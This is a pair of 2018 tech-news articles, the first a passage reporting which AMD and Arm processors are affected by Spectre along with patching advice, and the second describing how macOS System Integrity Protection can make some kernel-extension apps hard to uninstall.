    • The researchers say AMD’s Ryzen family is affected by Spectre. Googlers have confirmed AMD FX and AMD Pro cores can allow arbitrary data to be obtained by a user process; the proof-of-concept worked just within one process, though. An AMD Pro running Linux in a non-default configuration – the BPF JIT is enabled – also lets a normal user process read from 4GB of kernel virtual memory.
    • For Arm, Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72, Cortex-A73, and Cortex-A75 cores are affected by Spectre. Bear in mind Cortex-R series cores are for very specific and tightly controlled embedded environments, and are super unlikely to run untrusted code. To patch for Arm, apply the aforementioned KPTI fixes to your kernel, and/or recompile your code with new defenses described in the above-linked white paper.
    • Googlers were able to test that an Arm Cortex-A57 was able to be exploited to read arbitrary data from memory via cache sniffing; the proof-of-concept worked just within one process, though. Google is confident ARM-powered Android devices running the latest security updates are protected due to measures to thwart exploitation attempts – specifically, access to high-precision timers needed in attacks is restricted. Further security patches, mitigations and updates for Google’s products – including Chrome and ChromeOS – are listed here.
    • Discovered and reported by these separate teams: Jann Horn (Google Project Zero); and Paul Kocher in collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61).

We’re told Intel, AMD and Arm were warned of these security holes back in June last year. Our advice is to sit tight, install OS and firmware security updates as soon as you can, don’t run untrusted code, and consider turning on site isolation in your browser (Chrome, Firefox) to thwart malicious webpages trying to leverage these design flaws to steal session cookies from the browser process.

If you are using the Xen hypervisor, you should grab security patches now. Intel and AMD processors are affected, and they’re still checking whether Arm is.

“Xen guests may be able to infer the contents of arbitrary host memory, including memory assigned to other guests,” due to these processor security holes, according to the hypervisor project team.

If you’ve experienced a mass reboot – or are scheduled for one – by your public cloud provider, this’ll be why. Xen needs patching.

Meanwhile, VMware’s ESXi, Workstation and Fusion hypervisors need patching to counteract the underlying hardware design flaws.

Finally, if you are of the opinion that us media types are being hysterical about this design blunder, check this out: CERT recommends throwing away your CPU and buying an non-vulnerable one to truly fix the issue. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/04/intel_amd_arm_cpu_vulnerability/

Apple macOS so secure some apps can’t be easily deleted

An Apple macOS security process called System Integrity Protection can prevent certain apps from being easily uninstalled, which isn’t ideal when the code may be vulnerable or malware.

System Integrity Protection, or SIP, has clear benefits for macOS security. Introduced in OS X El Capitan (10.11) in 2015, it applied a new security policy to every process running on the system.

SIP attempts to ensure that system binaries can only be modified by Apple’s Software Update mechanism or by the app installer if the code is an Apple signed package. It also attempts to prevent runtime attachments and code injection.

Apart from past bugs, SIP – also referred to as “rootless” because of the attribute text used to designate SIP protection – has generally improved macOS security.

Because Apple’s app sandboxing and app guidelines already prevent such behavior for apps distributed through the macOS App Store, SIP’s primary impact has been on third-party developers distributing their apps outside of Apple’s oversight.

Permissionless app distribution isn’t possible on iOS without jailbreaking; but on macOS, developers can still distribute code without Apple’s blessing, though signing apps with a valid developer identity helps.

The macOS app BlueStacks, which allows Android apps to run on Apple systems, is an example of an app that needs to operate outside of Apple’s control because it installs a kernel extension (KEXT) to augment the capabilities of the macOS kernel.

And thanks to SIP, the app’s KEXT resists deinstallation.

Howard Oakley, a former MacUser writer, analyzed the problem in a blog post on Tuesday, describing SIP in macOS High Sierra as “broken.”

That may be something of an overstatement. In an email to The Register, Patrick Wardle, chief security researcher Synack, a computer security biz, said, “I don’t think it’s a security issue per se; rather just an annoyance.”

High Sierra, Oakley explains, provides a new authorization mechanism for third-party kernel extensions, which Apple calls User-Approved Kernel Extension Loading. It blocks third-party kernel extensions from being installed and requires an explicit grant of permission through the Security Privacy control panel.

Once the user authorizes the KEXT, Oakley says, High Sierra rolls it into a non-executable stub app that gets installed in /Library/StagedExtensions/Applications, where it gains protection from SIP through the addition of an extended attribute (xattr), com.apple.rootless.

Why is this “broken”? Simply put, Apple’s security model allows the installation of software but not its removal, at least without jumping through some hoops.

Removal is possible if you restart in Recovery mode, which disables SIP on the volume in question and allows the lingering stub app to be removed. But it’s not easy.

Oakley’s concern is that users may be duped into authorizing the installation of malicious code, thereby allowing it to hide behind SIP protection, which would make the malware difficult to dislodge.

That’s worthy of some concern, though a careless user is arguably more dangerous than an awkward security mechanism.

What may be more troubling is seeing macOS flirt with locked-down security model like iOS where the answer to a user’s command is, “I’m sorry, Dave. I’m afraid I can’t do that.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/03/apple_macos_sip/